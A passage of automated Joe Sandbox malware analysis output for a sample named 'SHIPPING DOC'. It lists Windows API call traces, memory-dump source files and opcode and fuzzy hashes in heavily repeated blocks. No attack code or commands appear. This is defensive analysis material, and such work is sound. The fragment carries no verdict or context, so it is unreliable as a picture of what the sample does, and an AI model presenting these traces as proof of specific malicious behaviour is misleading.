                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 752480666-0
                                                                                                                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3275902921-0
                                                                                                                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3275902921-0
                                                                                                                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32 ref: 004555C7
                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3691411573-0
                                                                                                                      • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                      • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                                      • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                      • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                      • EndPath.GDI32(?), ref: 004472D6
                                                                                                                      • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 372113273-0
                                                                                                                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1035833867-0
                                                                                                                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                      APIs
                                                                                                                      • __getptd.LIBCMT ref: 0041708E
                                                                                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                      • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                      • __lock.LIBCMT ref: 004170BE
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                      • _free.LIBCMT ref: 004170EE
                                                                                                                      • InterlockedIncrement.KERNEL32(02E92DB0), ref: 00417106
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3470314060-0
                                                                                                                      • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                      • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                      • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                      • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                      • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                      • __freefls@4.LIBCMT ref: 00415209
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 442100245-0
                                                                                                                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                      • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 621800784-4108050209
                                                                                                                      • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                                                                                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                      • Opcode Fuzzy Hash: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                                                                                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                      • String ID: \VH
                                                                                                                      • API String ID: 3884216118-234962358
                                                                                                                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
